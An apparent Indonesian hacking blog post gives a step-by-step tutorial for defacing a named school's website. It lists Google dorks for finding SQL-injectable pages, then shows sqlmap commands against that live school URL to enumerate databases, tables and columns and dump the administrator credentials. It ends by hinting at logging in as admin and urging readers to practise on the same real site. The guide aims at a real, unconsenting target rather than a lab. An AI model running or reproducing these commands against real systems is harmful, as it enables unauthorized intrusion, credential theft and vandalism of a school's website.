Berita Terkini
Loading...
Sunday 25 May 2014

TUTORIAL SQL MAP DEFACE WEBSITE SEKOLAH

03:21

Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Dan masih banyak lagi dork bertebaran di Google :D
Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.
Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan menambahkan tanda  - (minus) sebelum nomor id tersebut.
Contoh :                http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5''
Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira seperti ini :
Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah “cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.
Kemudian untuk mencari nama database, ketikkan “ ./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs” (tanpa tanda petik) kemudian Enter.

Kemudian akan muncul seperti ini :
Disana kita dapat menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita mendapatkan Database tersebut, kita tulis “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.

Setelah itu akan muncul beberapa Tabel.

Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter. 
Disini kita akan menjumpai beberapa Columns dari Tabel Admin. 
 
Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.

Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut:)
Jika sudah mendapatkan User + Pass, pasti Anda tau kan yang harus dilakukan ? :)
Nah, tinggal cari Login Adminnya deh :D
Caranya banyak kok di Google :)
Sekian dulu dari saya, saya ucapkan Terimakasih Banyak :)
Untuk yang ingin belajar SQL Map, silahkan menggunakan live targethttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5


0 komentar:

Post a Comment

 
Toggle Footer